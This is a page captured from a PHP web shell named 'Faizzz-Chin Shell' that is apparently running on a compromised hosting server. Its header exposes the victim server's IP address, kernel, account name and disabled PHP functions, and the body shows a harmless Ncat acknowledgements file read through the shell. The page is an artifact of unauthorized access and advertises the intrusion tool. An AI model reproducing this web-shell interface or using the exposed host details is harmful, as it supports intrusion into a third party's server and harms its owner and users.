SHELL BYPASS 403 |
Modern UI. Responsive. Powerful.

Faizzz-Chin Shell

: /usr/share/doc/nmap-ncat-6.40/ [ drwxr-xr-x ]
Uname\Kernel: Linux server.kxo.bgz.mybluehostin.me 3.10.0-1160.119.1.el7.tuxcare.els19.x86_64 #1 SMP Mon Mar 31 17:29:00 UTC 2025 x86_64
Server: Apache
PHP Version: 8.2.28 [ PHP INFO ]
Operating System: Linux
Server Ip: 162.240.163.222
Your Ip: 216.73.216.114
Date Time: 2025-07-11 04:48:16
User: dilseshaadi (1027) | Group: dilseshaadi (1027)
Safe Mode: OFF
Disable Function: exec,passthru,shell_exec,system

name : THANKS
Ncat Acknowledgements
=====================

This file is a short rambling of various "thank-you"'s to all 
the very generous support and advice received from various 
parties.

First and foremost: Thanks go out to Fyodor for all the support
and great ideas throughout the course of development and no doubt
also in the future.

Thanks to Google and the Summer of Code team. The points of
contact with Google being Chris DiBona, Natalie and Jude. Thanks to
you all for making this possible. Without whom I wouldn't even
be writing this.

Also, thank you to all the folks from #c on Undernet who kicked
me in the right direction when things were at their most broken.

Thanks to Jan for all her support and, well, general tolerance. :)

Thanks to all the people who've submitted bug reports, given me
ideas, helped me test Ncat or just given me general encouragement
over the previous years. It is most appreciated.

Finally, thanks to Hobbit for writing the original Netcat; it still 
rocks.

--Chris Gibson, <chris@linuxops.net>
© 2025 Faizzz-Chin